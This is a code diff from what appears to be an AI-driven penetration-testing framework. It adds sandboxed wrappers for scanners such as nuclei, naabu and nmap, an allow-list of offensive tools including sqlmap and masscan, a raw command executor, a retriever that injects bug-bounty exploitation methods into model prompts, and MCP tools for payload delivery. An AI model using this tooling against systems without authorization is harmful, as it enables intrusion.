+        return self._available and self._container is not None
+
+    async def stop(self):
+        """Stop and remove this scan's container."""
+        if self._container:
+            try:
+                self._container.stop(timeout=10)
+            except Exception:
+                pass
+            try:
+                self._container.remove(force=True)
+                logger.info(f"Destroyed container {self.container_name}")
+            except Exception as e:
+                logger.warning(f"Error removing {self.container_name}: {e}")
+            self._container = None
+            self._available = False
+
+    async def health_check(self) -> Dict:
+        """Run health check on this container."""
+        if not self.is_available:
+            return {"status": "unavailable", "scan_id": self.scan_id, "tools": []}
+
+        result = await self._exec(
+            "nuclei -version 2>&1; naabu -version 2>&1; nmap --version 2>&1 | head -1",
+            timeout=15,
+        )
+        tools = []
+        output = (result.stdout or "").lower()
+        for tool in ["nuclei", "naabu", "nmap"]:
+            if tool in output:
+                tools.append(tool)
+
+        uptime = 0.0
+        if self._created_at:
+            uptime = (datetime.utcnow() - self._created_at).total_seconds()
+
+        return {
+            "status": "healthy" if tools else "degraded",
+            "scan_id": self.scan_id,
+            "container": self.container_name,
+            "tools": tools,
+            "installed_tools": sorted(self._installed_tools),
+            "uptime_seconds": uptime,
+        }
+
+    # ------------------------------------------------------------------
+    # Low-level execution
+    # ------------------------------------------------------------------
+    async def _exec(self, command: str, timeout: int = DEFAULT_TIMEOUT) -> SandboxResult:
+        """Execute command inside this container via docker exec."""
+        if not self.is_available:
+            return SandboxResult(
+                tool="kali", command=command, exit_code=-1,
+                stdout="", stderr="", duration_seconds=0,
+                error="Container not available",
+            )
+
+        started = time.time()
+        try:
+            exec_result = await asyncio.get_event_loop().run_in_executor(
+                None,
+                lambda: self._container.exec_run(
+                    cmd=["bash", "-c", command],
+                    stdout=True, stderr=True, demux=True,
+                ),
+            )
+
+            duration = time.time() - started
+            stdout_raw, stderr_raw = exec_result.output
+            stdout = (stdout_raw or b"").decode("utf-8", errors="replace")
+            stderr = (stderr_raw or b"").decode("utf-8", errors="replace")
+
+            if len(stdout) > self.MAX_OUTPUT:
+                stdout = stdout[: self.MAX_OUTPUT] + "\n... [truncated]"
+            if len(stderr) > self.MAX_OUTPUT:
+                stderr = stderr[: self.MAX_OUTPUT] + "\n... [truncated]"
+
+            return SandboxResult(
+                tool="kali", command=command,
+                exit_code=exec_result.exit_code,
+                stdout=stdout, stderr=stderr,
+                duration_seconds=round(duration, 2),
+            )
+        except Exception as e:
+            duration = time.time() - started
+            return SandboxResult(
+                tool="kali", command=command, exit_code=-1,
+                stdout="", stderr="", duration_seconds=round(duration, 2),
+                error=str(e),
+            )
+
+    # ------------------------------------------------------------------
+    # On-demand tool installation
+    # ------------------------------------------------------------------
+    async def _ensure_tool(self, tool: str) -> bool:
+        """Ensure a tool is installed in this container. Returns True if available."""
+        if tool in self._installed_tools:
+            return True
+
+        # Check if already present in the base image
+        check = await self._exec(f"which {shlex.quote(tool)} 2>/dev/null", timeout=10)
+        if check.exit_code == 0 and check.stdout.strip():
+            self._installed_tools.add(tool)
+            return True
+
+        # Get install recipe from registry
+        recipe = self._tool_registry.get_install_command(tool)
+        if not recipe:
+            logger.warning(f"No install recipe for '{tool}' in Kali container")
+            return False
+
+        logger.info(f"[{self.container_name}] Installing {tool}...")
+        result = await self._exec(recipe, timeout=300)
+        if result.exit_code == 0:
+            self._installed_tools.add(tool)
+            logger.info(f"[{self.container_name}] Installed {tool} successfully")
+            return True
+        else:
+            logger.warning(
+                f"[{self.container_name}] Failed to install {tool}: "
+                f"{(result.stderr or result.stdout or '')[:300]}"
+            )
+            return False
+
+    # ------------------------------------------------------------------
+    # High-level tool APIs (same signatures as SandboxManager)
+    # ------------------------------------------------------------------
+    async def run_nuclei(
+        self, target, templates=None, severity=None,
+        tags=None, rate_limit=150, timeout=600,
+    ) -> SandboxResult:
+        await self._ensure_tool("nuclei")
+        cmd_parts = [
+            "nuclei", "-u", shlex.quote(target),
+            "-jsonl", "-rate-limit", str(rate_limit),
+            "-silent", "-no-color",
+        ]
+        if templates:
+            cmd_parts.extend(["-t", shlex.quote(templates)])
+        if severity:
+            cmd_parts.extend(["-severity", shlex.quote(severity)])
+        if tags:
+            cmd_parts.extend(["-tags", shlex.quote(tags)])
+
+        result = await self._exec(" ".join(cmd_parts) + " 2>/dev/null", timeout=timeout)
+        result.tool = "nuclei"
+        if result.stdout:
+            result.findings = parse_nuclei_jsonl(result.stdout)
+        return result
+
+    async def run_naabu(
+        self, target, ports=None, top_ports=None,
+        scan_type="s", rate=1000, timeout=300,
+    ) -> SandboxResult:
+        await self._ensure_tool("naabu")
+        cmd_parts = [
+            "naabu", "-host", shlex.quote(target),
+            "-json", "-rate", str(rate), "-silent", "-no-color",
+        ]
+        if ports:
+            cmd_parts.extend(["-p", shlex.quote(str(ports))])
+        elif top_ports:
+            cmd_parts.extend(["-top-ports", str(top_ports)])
+        else:
+            cmd_parts.extend(["-top-ports", "1000"])
+        if scan_type:
+            cmd_parts.extend(["-scan-type", scan_type])
+
+        result = await self._exec(" ".join(cmd_parts) + " 2>/dev/null", timeout=timeout)
+        result.tool = "naabu"
+        if result.stdout:
+            result.findings = parse_naabu_output(result.stdout)
+        return result
+
+    async def run_httpx(self, targets, timeout=120) -> SandboxResult:
+        await self._ensure_tool("httpx")
+        if isinstance(targets, str):
+            targets = [targets]
+        target_str = "\\n".join(shlex.quote(t) for t in targets)
+        command = (
+            f'echo -e "{target_str}" | httpx -silent -json '
+            f'-title -tech-detect -status-code -content-length '
+            f'-follow-redirects -no-color 2>/dev/null'
+        )
+        result = await self._exec(command, timeout=timeout)
+        result.tool = "httpx"
+        if result.stdout:
+            findings = []
+            for line in result.stdout.strip().split("\\n"):
+                try:
+                    data = json.loads(line)
+                    findings.append({
+                        "url": data.get("url", ""),
+                        "status_code": data.get("status_code", 0),
+                        "title": data.get("title", ""),
+                        "technologies": data.get("tech", []),
+                        "content_length": data.get("content_length", 0),
+                        "webserver": data.get("webserver", ""),
+                    })
+                except (json.JSONDecodeError, ValueError):
+                    continue
+            result.findings = findings
+        return result
+
+    async def run_subfinder(self, domain, timeout=120) -> SandboxResult:
+        await self._ensure_tool("subfinder")
+        command = f"subfinder -d {shlex.quote(domain)} -silent -no-color 2>/dev/null"
+        result = await self._exec(command, timeout=timeout)
+        result.tool = "subfinder"
+        if result.stdout:
+            subs = [s.strip() for s in result.stdout.strip().split("\\n") if s.strip()]
+            result.findings = [{"subdomain": s} for s in subs]
+        return result
+
+    async def run_nmap(self, target, ports=None, scripts=True, timeout=300) -> SandboxResult:
+        await self._ensure_tool("nmap")
+        cmd_parts = ["nmap", "-sV"]
+        if scripts:
+            cmd_parts.append("-sC")
+        if ports:
+            cmd_parts.extend(["-p", shlex.quote(str(ports))])
+        cmd_parts.extend(["-oN", "/dev/stdout", shlex.quote(target)])
+        result = await self._exec(" ".join(cmd_parts) + " 2>/dev/null", timeout=timeout)
+        result.tool = "nmap"
+        return result
+
+    async def run_tool(self, tool, args, timeout=300) -> SandboxResult:
+        """Run any tool (validates whitelist, installs on demand)."""
+        # Load whitelist from config
+        allowed_tools = set()
+        try:
+            with open("config/config.json") as f:
+                cfg = json.load(f)
+            allowed_tools = set(cfg.get("sandbox", {}).get("tools", []))
+        except Exception:
+            pass
+
+        if not allowed_tools:
+            allowed_tools = {
+                "nuclei", "naabu", "nmap", "httpx", "subfinder", "katana",
+                "dnsx", "ffuf", "gobuster", "dalfox", "nikto", "sqlmap",
+                "whatweb", "curl", "dig", "whois", "masscan", "dirsearch",
+                "wfuzz", "arjun", "wafw00f", "waybackurls",
+            }
+
+        if tool not in allowed_tools:
+            return SandboxResult(
+                tool=tool, command=f"{tool} {args}", exit_code=-1,
+                stdout="", stderr="", duration_seconds=0,
+                error=f"Tool '{tool}' not in allowed list",
+            )
+
+        if not await self._ensure_tool(tool):
+            return SandboxResult(
+                tool=tool, command=f"{tool} {args}", exit_code=-1,
+                stdout="", stderr="", duration_seconds=0,
+                error=f"Could not install '{tool}' in Kali container",
+            )
+
+        result = await self._exec(f"{shlex.quote(tool)} {args} 2>&1", timeout=timeout)
+        result.tool = tool
+        return result
+
+    async def execute_raw(self, command, timeout=300) -> SandboxResult:
+        result = await self._exec(command, timeout=timeout)
+        result.tool = "raw"
+        return result
diff --git a/core/knowledge_augmentor.py b/core/knowledge_augmentor.py
new file mode 100644
index 0000000..9983e13
--- /dev/null
+++ b/core/knowledge_augmentor.py
@@ -0,0 +1,199 @@
+#!/usr/bin/env python3
+"""
+Knowledge Augmentor - Adversarial pattern recognition from bug bounty data.
+
+Loads the bug bounty finetuning dataset and provides retrieval-based
+context enrichment for agent prompts. This is for PATTERN RECOGNITION
+and adversarial intuition -- NOT for replaying exploits.
+
+The augmentor:
+- Builds a keyword index by vulnerability type
+- Retrieves relevant patterns matching current testing context
+- Injects formatted reference material into agent prompts
+- Explicitly instructs the model to adapt, not copy
+"""
+
+import json
+import logging
+from typing import Dict, List, Optional
+from pathlib import Path
+
+logger = logging.getLogger(__name__)
+
+
+class KnowledgeAugmentor:
+    """Retrieval-based knowledge augmentation from bug bounty dataset."""
+
+    # Vulnerability type keyword mappings
+    VULN_KEYWORDS = {
+        'xss': ['xss', 'cross-site scripting', 'reflected xss', 'stored xss', 'dom xss',
+                 'script injection', 'html injection'],
+        'sqli': ['sql injection', 'sqli', 'union select', 'blind sql', 'error-based sql',
+                 'time-based sql', 'second-order sql'],
+        'ssrf': ['ssrf', 'server-side request forgery', 'internal service'],
+        'idor': ['idor', 'insecure direct object', 'broken object level',
+                 'bola', 'horizontal privilege'],
+        'rce': ['rce', 'remote code execution', 'command injection', 'os command',
+                'code execution', 'shell injection'],
+        'lfi': ['lfi', 'local file inclusion', 'path traversal', 'directory traversal',
+                'file read', 'file disclosure'],
+        'auth_bypass': ['authentication bypass', 'broken authentication', 'auth bypass',
+                        'session fixation', 'jwt', 'token manipulation'],
+        'csrf': ['csrf', 'cross-site request forgery', 'state-changing'],
+        'open_redirect': ['open redirect', 'url redirect', 'redirect vulnerability'],
+        'xxe': ['xxe', 'xml external entity', 'xml injection'],
+        'ssti': ['ssti', 'server-side template injection', 'template injection'],
+        'race_condition': ['race condition', 'toctou', 'concurrency'],
+        'graphql': ['graphql', 'introspection', 'batching attack'],
+        'api': ['api', 'rest api', 'broken api', 'api key', 'rate limiting'],
+        'deserialization': ['deserialization', 'insecure deserialization', 'pickle',
+                           'object injection'],
+        'upload': ['file upload', 'unrestricted upload', 'web shell', 'upload bypass'],
+        'cors': ['cors', 'cross-origin', 'origin validation'],
+        'subdomain_takeover': ['subdomain takeover', 'dangling dns', 'cname'],
+        'information_disclosure': ['information disclosure', 'sensitive data', 'data exposure',
+                                   'directory listing', 'source code disclosure'],
+    }
+
+    def __init__(self, dataset_path: str = "models/bug-bounty/bugbounty_finetuning_dataset.json",
+                 max_patterns: int = 3):
+        self.dataset_path = Path(dataset_path)
+        self.max_patterns = max_patterns
+        self.entries: List[Dict] = []
+        self.index: Dict[str, List[int]] = {}  # vuln_type -> list of entry indices
+        self._loaded = False
+
+    def _ensure_loaded(self):
+        """Lazy load and index the dataset on first use."""
+        if self._loaded:
+            return
+
+        if not self.dataset_path.exists():
+            logger.warning(f"Bug bounty dataset not found: {self.dataset_path}")
+            self._loaded = True
+            return
+
+        try:
+            with open(self.dataset_path, 'r', encoding='utf-8') as f:
+                self.entries = json.load(f)
+            logger.info(f"Loaded {len(self.entries)} entries from bug bounty dataset")
+            self._build_index()
+        except Exception as e:
+            logger.error(f"Failed to load bug bounty dataset: {e}")
+
+        self._loaded = True
+
+    def _build_index(self):
+        """Build keyword index over the dataset entries."""
+        for i, entry in enumerate(self.entries):
+            text = (
+                entry.get('instruction', '') + ' ' +
+                entry.get('input', '') + ' ' +
+                entry.get('output', '')
+            ).lower()
+
+            for vuln_type, keywords in self.VULN_KEYWORDS.items():
+                for kw in keywords:
+                    if kw in text:
+                        self.index.setdefault(vuln_type, []).append(i)
+                        break  # One match per vuln_type per entry
+
+        indexed_types = {k: len(v) for k, v in self.index.items()}
+        logger.info(f"Knowledge index built: {indexed_types}")
+
+    def get_relevant_patterns(self, vulnerability_type: str,
+                               technologies: Optional[List[str]] = None,
+                               max_entries: Optional[int] = None) -> str:
+        """Retrieve relevant bug bounty patterns for context enrichment.
+
+        Args:
+            vulnerability_type: Type of vulnerability being tested (e.g., 'xss', 'sqli')
+            technologies: Optional list of detected technologies for relevance boosting
+            max_entries: Override default max patterns count
+
+        Returns:
+            Formatted string for injection into LLM prompts as cognitive augmentation.
+            Returns empty string if no relevant patterns found.
+        """
+        self._ensure_loaded()
+
+        limit = max_entries or self.max_patterns
+        vuln_key = vulnerability_type.lower().replace(' ', '_').replace('-', '_')
+
+        # Try exact match first, then partial
+        candidates = self.index.get(vuln_key, [])
+        if not candidates:
+            # Try partial matching
+            for key, indices in self.index.items():
+                if vuln_key in key or key in vuln_key:
+                    candidates = indices
+                    break
+
+        if not candidates:
+            return ""
+
+        # Deduplicate
+        candidates = list(dict.fromkeys(candidates))
+
+        # Score by technology relevance if technologies provided
+        if technologies:
+            scored = []
+            for idx in candidates:
+                entry = self.entries[idx]
+                text = (entry.get('output', '') + ' ' + entry.get('instruction', '')).lower()
+                tech_score = sum(1 for t in technologies if t.lower() in text)
+                scored.append((tech_score, idx))
+            scored.sort(key=lambda x: x[0], reverse=True)
+            candidates = [idx for _, idx in scored]
+
+        selected = candidates[:limit]
+
+        # Build augmentation context
+        augmentation = (
+            "\n\n=== ADVERSARIAL PATTERN CONTEXT (Bug Bounty Knowledge) ===\n"
+            "These are REFERENCE PATTERNS for understanding attack vectors and methodology.\n"
+            "ADAPT the approach to the current target. Do NOT replay exact exploits.\n"
+            "Use these as cognitive anchors for creative hypothesis generation.\n\n"
+        )
+
+        for i, idx in enumerate(selected, 1):
+            entry = self.entries[idx]
+            instruction = entry.get('instruction', '')[:300]
+            output = entry.get('output', '')
+
+            # Extract methodology-relevant sections, truncate for context budget
+            methodology = self._extract_methodology(output, max_chars=1500)
+
+            augmentation += f"--- Pattern {i} ---\n"
+            augmentation += f"Context: {instruction}\n"
+            augmentation += f"Methodology:\n{methodology}\n\n"
+
+        augmentation += "=== END ADVERSARIAL PATTERN CONTEXT ===\n"
+        return augmentation
+
+    def _extract_methodology(self, text: str, max_chars: int = 1500) -> str:
+        """Extract the most methodology-relevant portion of a writeup."""
+        # Look for methodology/steps/approach sections
+        markers = ['### steps', '### methodology', '### approach', '### exploitation',
+                    '## steps', '## methodology', '## approach', '## exploitation',
+                    'steps to reproduce', 'reproduction steps', 'proof of concept']
+
+        text_lower = text.lower()
+        for marker in markers:
+            idx = text_lower.find(marker)
+            if idx != -1:
+                return text[idx:idx + max_chars]
+
+        # Fall back to first max_chars of the output
+        return text[:max_chars]
+
+    def get_available_types(self) -> List[str]:
+        """Return list of vulnerability types that have indexed entries."""
+        self._ensure_loaded()
+        return sorted(self.index.keys())
+
+    def get_entry_count(self, vulnerability_type: str) -> int:
+        """Return count of indexed entries for a vulnerability type."""
+        self._ensure_loaded()
+        vuln_key = vulnerability_type.lower().replace(' ', '_').replace('-', '_')
+        return len(self.index.get(vuln_key, []))
diff --git a/core/llm_manager.py b/core/llm_manager.py
index d5d2a1f..2d1afd5 100644
--- a/core/llm_manager.py
+++ b/core/llm_manager.py
@@ -48,6 +48,20 @@ class LLMManager:
         self.pdf_support_enabled = self.active_profile.get('pdf_support_enabled', False)
         self.guardrails_enabled = self.active_profile.get('guardrails_enabled', False)
         self.hallucination_mitigation_strategy = self.active_profile.get('hallucination_mitigation_strategy', None)
+
+        # MAX_OUTPUT_TOKENS override from environment (up to 64000 for Claude)
+        env_max_tokens = os.getenv('MAX_OUTPUT_TOKENS', '').strip()
+        if env_max_tokens:
+            try:
+                override = int(env_max_tokens)
+                self.max_tokens = override
+                self.output_token_limit = override
+                logger.info(f"MAX_OUTPUT_TOKENS override applied: {override}")
+            except ValueError:
+                logger.warning(f"Invalid MAX_OUTPUT_TOKENS value: {env_max_tokens}")
+
+        # Model router (lazy init, set externally or via config)
+        self._model_router = None
         
         # New prompt loading
         self.json_prompts_file_path = Path("prompts/library.json")
@@ -147,6 +161,8 @@ class LLMManager:
                 raw_response = self._generate_gemini_cli(prompt, system_prompt)
             elif self.provider == 'lmstudio':
                 raw_response = self._generate_lmstudio(prompt, system_prompt)
+            elif self.provider == 'openrouter':
+                raw_response = self._generate_openrouter(prompt, system_prompt)
             else:
                 raise ValueError(f"Unsupported provider: {self.provider}")
         except Exception as e:
@@ -162,6 +178,21 @@ class LLMManager:
         
         return raw_response
 
+    def routed_generate(self, prompt: str, system_prompt: Optional[str] = None, task_type: str = "default") -> str:
+        """Generate with optional model routing based on task type.
+
+        If model routing is enabled and a route exists for the task_type,
+        a dedicated LLMManager for that profile handles the request.
+        Otherwise falls back to the default generate().
+
+        Task types: reasoning, analysis, generation, validation, default
+        """
+        if self._model_router:
+            result = self._model_router.generate(prompt, system_prompt, task_type)
+            if result is not None:
+                return result
+        return self.generate(prompt, system_prompt)
+
     def _apply_guardrails(self, response: str) -> str:
         """Applies basic guardrails to the LLM response."""
         if not self.guardrails_enabled:
@@ -614,6 +645,77 @@ Identify any potential hallucinations, inconsistencies, or areas where the respo
             logger.error(f"LM Studio error: {e}")
             return f"Error: {str(e)}"
 
+    def _generate_openrouter(self, prompt: str, system_prompt: Optional[str] = None) -> str:
+        """Generate using OpenRouter API (OpenAI-compatible).
+
+        OpenRouter supports hundreds of models through a unified API.
+        Models are specified as provider/model (e.g., 'anthropic/claude-sonnet-4-20250514').
+        API key comes from OPENROUTER_API_KEY env var or config profile.
+        """
+        if not self.api_key:
+            raise ValueError("OPENROUTER_API_KEY not set. Please set the environment variable or configure in config.json")
+
+        url = "https://openrouter.ai/api/v1/chat/completions"
+        headers = {
+            "Authorization": f"Bearer {self.api_key}",
+            "Content-Type": "application/json",
+            "HTTP-Referer": "https://github.com/neurosploit",
+            "X-Title": "NeuroSploit"
+        }
+
+        messages = []
+        if system_prompt:
+            messages.append({"role": "system", "content": system_prompt})
+        messages.append({"role": "user", "content": prompt})
+
+        data = {
+            "model": self.model,
+            "messages": messages,
+            "temperature": self.temperature,
+            "max_tokens": self.max_tokens
+        }
+
+        last_error = None
+        for attempt in range(MAX_RETRIES):
+            try:
+                logger.debug(f"OpenRouter API request attempt {attempt + 1}/{MAX_RETRIES} (model: {self.model})")
+                response = requests.post(url, headers=headers, json=data, timeout=180)
+
+                if response.status_code == 200:
+                    result = response.json()
+                    return result["choices"][0]["message"]["content"]
+
+                elif response.status_code == 401:
+                    raise ValueError(f"Invalid OpenRouter API key: {response.text}")
+
+                elif response.status_code == 429:
+                    last_error = f"Rate limit: {response.text}"
+                    logger.warning(f"OpenRouter rate limit (attempt {attempt + 1}/{MAX_RETRIES})")
+                    if attempt < MAX_RETRIES - 1:
+                        sleep_time = RETRY_DELAY * (RETRY_MULTIPLIER ** (attempt + 1))
+                        time.sleep(sleep_time)
+
+                elif response.status_code >= 500:
+                    last_error = f"Server error {response.status_code}: {response.text}"
+                    logger.warning(f"OpenRouter server error (attempt {attempt + 1}/{MAX_RETRIES})")
+                    if attempt < MAX_RETRIES - 1:
+                        sleep_time = RETRY_DELAY * (RETRY_MULTIPLIER ** attempt)
+                        time.sleep(sleep_time)
+
+                else:
+                    raise ValueError(f"OpenRouter API error {response.status_code}: {response.text}")
+
+            except requests.exceptions.Timeout:
+                last_error = "Timeout"
+                logger.warning(f"OpenRouter timeout (attempt {attempt + 1}/{MAX_RETRIES})")
+                if attempt < MAX_RETRIES - 1:
+                    time.sleep(RETRY_DELAY * (RETRY_MULTIPLIER ** attempt))
+
+            except requests.exceptions.ConnectionError as e:
+                raise ValueError(f"Cannot connect to OpenRouter API: {e}")
+
+        raise ValueError(f"OpenRouter API failed after {MAX_RETRIES} retries: {last_error}")
+
     def analyze_vulnerability(self, vulnerability_data: Dict) -> Dict:
         """Analyze vulnerability and suggest exploits"""
         # This prompt will be fetched from library.json later
diff --git a/core/mcp_client.py b/core/mcp_client.py
new file mode 100644
index 0000000..1a8f6b8
--- /dev/null
+++ b/core/mcp_client.py
@@ -0,0 +1,244 @@
+#!/usr/bin/env python3
+"""
+MCP Client - Model Context Protocol tool connectivity.
+
+Provides a standard interface for connecting to MCP servers and
+executing tools. Supports both stdio and SSE transports.
+
+Coexists with existing subprocess-based tool execution:
+- MCP is tried first when enabled
+- Falls back silently to subprocess if MCP unavailable
+"""
+
+import asyncio
+import json
+import logging
+from typing import Dict, List, Optional, Any
+from pathlib import Path
+
+logger = logging.getLogger(__name__)
+
+try:
+    from mcp import ClientSession, StdioServerParameters
+    from mcp.client.stdio import stdio_client
+    HAS_MCP = True
+except ImportError:
+    HAS_MCP = False
+    logger.debug("MCP package not installed. MCP tool connectivity disabled.")
+
+try:
+    from mcp.client.sse import sse_client
+    HAS_MCP_SSE = True
+except ImportError:
+    HAS_MCP_SSE = False
+
+
+class MCPToolClient:
+    """Client for connecting to MCP servers and executing tools."""
+
+    def __init__(self, config: Dict):
+        mcp_config = config.get('mcp_servers', {})
+        self.enabled = mcp_config.get('enabled', False) and HAS_MCP
+        self.servers_config = mcp_config.get('servers', {})
+        self._sessions: Dict[str, Any] = {}  # server_name -> (session, cleanup)
+        self._available_tools: Dict[str, List[Dict]] = {}  # server_name -> tools list
+
+        if self.enabled:
+            logger.info(f"MCP client initialized with {len(self.servers_config)} server(s)")
+        else:
+            if not HAS_MCP and mcp_config.get('enabled', False):
+                logger.warning("MCP enabled in config but mcp package not installed. "
+                              "Install with: pip install mcp>=1.0.0")
+
+    async def connect(self, server_name: str) -> bool:
+        """Establish connection to an MCP server.
+
+        Returns True if connection successful, False otherwise.
+        """
+        if not self.enabled:
+            return False
+
+        if server_name in self._sessions:
+            return True  # Already connected
+
+        server_config = self.servers_config.get(server_name)
+        if not server_config:
+            logger.error(f"MCP server '{server_name}' not found in config")
+            return False
+
+        transport = server_config.get('transport', 'stdio')
+
+        try:
+            if transport == 'stdio':
+                return await self._connect_stdio(server_name, server_config)
+            elif transport == 'sse':
+                return await self._connect_sse(server_name, server_config)
+            else:
+                logger.error(f"Unsupported MCP transport: {transport}")
+                return False
+        except Exception as e:
+            logger.error(f"Failed to connect to MCP server '{server_name}': {e}")
+            return False
+
+    async def _connect_stdio(self, server_name: str, config: Dict) -> bool:
+        """Connect to a stdio-based MCP server."""
+        if not HAS_MCP:
+            return False
+
+        command = config.get('command', '')
+        args = config.get('args', [])
+
+        if not command:
+            logger.error(f"MCP server '{server_name}' has no command specified")
+            return False
+
+        server_params = StdioServerParameters(
+            command=command,
+            args=args,
+            env=config.get('env')
+        )
+
+        try:
+            # Create the stdio client connection
+            read_stream, write_stream = await asyncio.wait_for(
+                self._start_stdio_process(server_params),
+                timeout=30
+            )
+
+            session = ClientSession(read_stream, write_stream)
+            await session.initialize()
+
+            # Cache available tools
+            tools_result = await session.list_tools()
+            self._available_tools[server_name] = [
+                {"name": t.name, "description": t.description}
+                for t in tools_result.tools
+            ]
+
+            self._sessions[server_name] = session
+            logger.info(f"Connected to MCP server '{server_name}' via stdio "
+                       f"({len(self._available_tools[server_name])} tools available)")
+            return True
+
+        except Exception as e:
+            logger.error(f"Stdio connection to '{server_name}' failed: {e}")
+            return False
+
+    async def _start_stdio_process(self, params: 'StdioServerParameters'):
+        """Start a stdio MCP server process."""
+        async with stdio_client(params) as (read, write):
+            return read, write
+
+    async def _connect_sse(self, server_name: str, config: Dict) -> bool:
+        """Connect to an SSE-based MCP server."""
+        if not HAS_MCP_SSE:
+            logger.error("MCP SSE transport not available")
+            return False
+
+        url = config.get('url', '')
+        if not url:
+            logger.error(f"MCP server '{server_name}' has no URL specified")
+            return False
+
+        try:
+            async with sse_client(url) as (read, write):
+                session = ClientSession(read, write)
+                await session.initialize()
+
+                tools_result = await session.list_tools()
+                self._available_tools[server_name] = [
+                    {"name": t.name, "description": t.description}
+                    for t in tools_result.tools
+                ]
+
+                self._sessions[server_name] = session
+                logger.info(f"Connected to MCP server '{server_name}' via SSE "
+                           f"({len(self._available_tools[server_name])} tools available)")
+                return True
+
+        except Exception as e:
+            logger.error(f"SSE connection to '{server_name}' failed: {e}")
+            return False
+
+    async def call_tool(self, server_name: str, tool_name: str,
+                         arguments: Optional[Dict] = None) -> Optional[str]:
+        """Call a tool on an MCP server.
+
+        Returns the tool result as a string, or None if the call fails.
+        """
+        if not self.enabled:
+            return None
+
+        session = self._sessions.get(server_name)
+        if not session:
+            connected = await self.connect(server_name)
+            if not connected:
+                return None
+            session = self._sessions.get(server_name)
+
+        try:
+            result = await session.call_tool(tool_name, arguments or {})
+            # Extract text content from result
+            if result.content:
+                texts = [c.text for c in result.content if hasattr(c, 'text')]
+                return '\n'.join(texts) if texts else str(result.content)
+            return ""
+
+        except Exception as e:
+            logger.error(f"MCP tool call failed ({server_name}/{tool_name}): {e}")
+            return None
+
+    async def list_tools(self, server_name: str = None) -> Dict[str, List[Dict]]:
+        """List available tools from MCP servers.
+
+        If server_name is specified, lists tools for that server only.
+        Otherwise lists tools from all connected servers.
+        """
+        if server_name:
+            tools = self._available_tools.get(server_name, [])
+            return {server_name: tools}
+
+        return dict(self._available_tools)
+
+    def find_tool_server(self, tool_name: str) -> Optional[str]:
+        """Find which MCP server provides a given tool.
+
+        Returns the server name, or None if no server has the tool.
+        """
+        for server_name, tools in self._available_tools.items():
+            for tool in tools:
+                if tool["name"] == tool_name:
+                    return server_name
+        return None
+
+    async def try_tool(self, tool_name: str, arguments: Optional[Dict] = None) -> Optional[str]:
+        """Try to execute a tool via any available MCP server.
+
+        Searches all configured servers for the tool and executes it.
+        Returns None silently if no server has the tool (for fallback pattern).
+        """
+        if not self.enabled:
+            return None
+
+        # Connect to any servers not yet connected
+        for server_name in self.servers_config:
+            if server_name not in self._sessions:
+                await self.connect(server_name)
+
+        server = self.find_tool_server(tool_name)
+        if server:
+            return await self.call_tool(server, tool_name, arguments)
+
+        return None  # Silent fallback
+
+    async def disconnect_all(self):
+        """Disconnect from all MCP servers."""
+        for server_name, session in self._sessions.items():
+            try:
+                if hasattr(session, 'close'):
+                    await session.close()
+            except Exception as e:
+                logger.debug(f"Error closing MCP session '{server_name}': {e}")
+        self._sessions.clear()
+        self._available_tools.clear()
+        logger.info("Disconnected from all MCP servers")
diff --git a/core/mcp_server.py b/core/mcp_server.py
new file mode 100644
index 0000000..9b75f4f
--- /dev/null
+++ b/core/mcp_server.py
@@ -0,0 +1,626 @@
+#!/usr/bin/env python3
+"""
+NeuroSploit MCP Server — Exposes pentest tools via Model Context Protocol.
+
+Tools:
+  - screenshot_capture: Playwright browser screenshots
+  - payload_delivery: HTTP payload sending with full response capture
+  - dns_lookup: DNS record enumeration
+  - port_scan: TCP port scanning
+  - technology_detect: HTTP header-based tech fingerprinting
+  - subdomain_enumerate: Subdomain discovery via DNS brute-force
+  - save_finding: Persist a finding to agent memory
+  - get_vuln_prompt: Retrieve AI decision prompt for a vuln type
+  - execute_nuclei: Run Nuclei scanner in Docker sandbox (8000+ templates)
+  - execute_naabu: Run Naabu port scanner in Docker sandbox
+  - sandbox_health: Check sandbox container status
+  - sandbox_exec: Execute any allowed tool in the sandbox
+
+Usage:
+  python3 -m core.mcp_server          # stdio transport (default)
+  MCP_TRANSPORT=sse python3 -m core.mcp_server  # SSE transport
+"""
+
+import asyncio
+import json
+import os
+import socket
+import logging
+from typing import Dict, Any, Optional, List
+
+logger = logging.getLogger(__name__)
+
+# Guard MCP import — server only works where mcp package is available
+try:
+    from mcp.server import Server
+    from mcp.server.stdio import stdio_server
+    from mcp.types import Tool, TextContent
+    HAS_MCP = True
+except ImportError:
+    HAS_MCP = False
+    logger.warning("MCP package not installed. Install with: pip install 'mcp>=1.0.0'")
+
+# Guard Playwright import
+try:
+    from core.browser_validator import BrowserValidator
+    HAS_PLAYWRIGHT = True
+except ImportError:
+    HAS_PLAYWRIGHT = False
+
+# AI prompts access
+try:
+    from backend.core.vuln_engine.ai_prompts import get_prompt, build_testing_prompt
+    HAS_AI_PROMPTS = True
+except ImportError:
+    HAS_AI_PROMPTS = False
+
+# Security sandbox access
+try:
+    from core.sandbox_manager import get_sandbox, SandboxManager
+    HAS_SANDBOX = True
+except ImportError:
+    HAS_SANDBOX = False
+
+
+# ---------------------------------------------------------------------------
+# Tool implementations
+# ---------------------------------------------------------------------------
+
+async def _screenshot_capture(url: str, selector: Optional[str] = None) -> Dict:
+    """Capture a screenshot of a URL using Playwright."""
+    if not HAS_PLAYWRIGHT:
+        return {"error": "Playwright not available", "screenshot": None}
+
+    try:
+        bv = BrowserValidator()
+        result = await bv.capture_screenshot(url, selector=selector)
+        return {"url": url, "screenshot_base64": result.get("screenshot", ""), "status": "ok"}
+    except Exception as e:
+        return {"error": str(e), "screenshot": None}
+
+
+async def _payload_delivery(
+    endpoint: str,
+    method: str = "GET",
+    payload: str = "",
+    content_type: str = "application/x-www-form-urlencoded",
+    headers: Optional[Dict] = None,
+    param: str = "q",
+) -> Dict:
+    """Send an HTTP request with a payload and capture full response."""
+    import aiohttp
+
+    try:
+        async with aiohttp.ClientSession() as session:
+            req_headers = {"Content-Type": content_type}
+            if headers:
+                req_headers.update(headers)
+
+            if method.upper() == "GET":
+                async with session.get(endpoint, params={param: payload}, headers=req_headers, timeout=15, allow_redirects=False) as resp:
+                    body = await resp.text()
+                    return {
+                        "status": resp.status,
+                        "headers": dict(resp.headers),
+                        "body": body[:5000],
+                        "body_length": len(body),
+                    }
+            else:
+                data = {param: payload} if content_type != "application/json" else None
+                json_data = json.loads(payload) if content_type == "application/json" else None
+                async with session.request(
+                    method.upper(), endpoint, data=data, json=json_data,
+                    headers=req_headers, timeout=15, allow_redirects=False
+                ) as resp:
+                    body = await resp.text()
+                    return {
+                        "status": resp.status,
